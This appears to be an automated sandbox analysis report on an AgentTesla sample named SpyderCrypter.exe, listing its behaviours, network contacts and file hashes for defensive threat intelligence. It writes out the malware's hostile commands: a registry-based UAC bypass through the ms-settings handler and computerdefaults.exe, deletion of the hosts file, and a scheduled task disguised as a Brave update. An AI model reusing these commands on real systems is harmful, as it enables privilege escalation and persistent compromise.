Analysis Overview
SHA256: 8babb9a5318d0b2fa43d6c18e91a23a70de547243db91f866e50bb2ff1b7db8b
Threat Level: Known bad
The file SpyderCrypter.exe was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Identifies VirtualBox via ACPI registry values (likely anti-VM)
AgentTesla payload
Checks computer location settings
Executes dropped EXE
Themida packer
Checks BIOS information in registry
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Enumerates physical storage devices
Unsigned PE
Program crash
Modifies registry class
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-06-15 18:22
Signatures
Themida packer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-15 18:22
Reported: 2024-06-15 18:25
Platform: win10v2004-20240611-en
Max time kernel: 41s
Max time network: 36s
Command Line
Signatures
AgentTesla
AgentTesla payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\jackpear63605335.vbs" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe | "C:\Users\Admin\AppData\Local\Temp\SpyderCrypter.exe" |
| C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe | "C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe" |
| C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs" /f |
| C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f |
| C:\Windows\SysWOW64\cmd.exe | "cmd.exe" /C computerdefaults.exe |
| C:\Windows\SysWOW64\ComputerDefaults.exe | computerdefaults.exe |
| C:\Windows\SysWOW64\wscript.exe | "wscript.exe" C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN BraveUpdateScheduler_QMyk9gHxWJYAojiqe050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\QMyk9gHxWJYAojiqe050MX.exe" /RL HIGHEST /IT |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /Create /SC ONLOGON /TN BraveUpdateScheduler_QMyk9gHxWJYAojiqe050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\QMyk9gHxWJYAojiqe050MX.exe" /RL HIGHEST /IT |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3600 -ip 3600 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 1808 |
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | textpubshiers.top | udp |
| US | 172.67.146.76:443 | textpubshiers.top | tcp |
| US | 8.8.8.8:53 | 76.146.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\SpyderResources.exe
| MD5 | cc132ca7e1cf77db1a3e737260fcf14b |
| SHA1 | f6058656d44e95c23071251b278bc779a88083da |
| SHA256 | 4c62d4e150f91dc3fdd1f29c955763c52f357045b1a2edf98ac272631dfdb210 |
| SHA512 | 52e64fdf7acf08525ddb352b0dd0b6ca3df8d8f13fa09dcd31c270c4e2040f2361c04ba56915cd05539f581df712562537239fbc942131cc725502af6d010fee |
C:\Users\Admin\AppData\Local\Temp\jackpear63605335.vbs
| MD5 | a34267102c21aff46aecc85598924544 |
| SHA1 | 77268af47c6a4b9c6be7f7487b2c9b233d49d435 |
| SHA256 | eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44 |
| SHA512 | 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3 |